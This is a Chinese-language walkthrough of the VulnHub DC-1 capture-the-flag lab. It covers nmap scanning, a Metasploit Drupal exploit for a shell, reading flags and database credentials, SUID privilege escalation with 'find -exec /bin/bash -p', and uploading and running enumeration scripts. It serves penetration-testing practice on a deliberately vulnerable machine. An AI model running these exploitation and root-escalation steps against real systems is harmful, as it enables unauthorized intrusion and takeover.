Vulnhub靶场DC-1 渗透测试笔记
靶场地址DC: 1 ~ VulnHub信息打点kali扫描存活网段ip,排除kali本身得到靶场ip192.168.72.137端口全扫描nmap -A 192.168.72.137拿到webshell指纹识别查找历史漏洞search drupaluse 1show options(查看配置)set rhosts 192.168.72.137run通过msf进入shell查看泄露信息flag1.txtshelllscat flag1.txtEvery good CMS needs a config file - and so do you.翻译过来就是每一个内容管理系统都需要配置文件提示找配置文件固定得到了flag2和数据库配置信息flag2提示提升权限为root来查看敏感文件或者直接爆破suid提权find / -perm -4000 -type f 2/dev/null查找可以用的suid提权find . -exec /bin/bash -p \; -quit(提权命令)id/whoami(提权验证)这里推荐几个综合提权项目可以通过上传对系统进行初步测试https://github.com/carlospolop/PEASS-nghttps://github.com/diego-treitos/linux-smart-enumerationhttps://github.com/redcode-labs/Basharkhttps://github.com/rebootuser/LinEnum插件提权upload /home/kali/lse.sh /tmp/lse.sh上传检测脚本ls -al /tmp(查看是否上传成功)chmod 755 /tmp/lse.sh给到执行权限bash /tmp/lse.sh运行)拿到通关flagls -al /rootcat /root/thefinalflag.txt总结1.思路web入口webshellflag1数据库flag2提权flag4.txt2.综合提权脚本只能进行初步检测为我们提供权限提升方向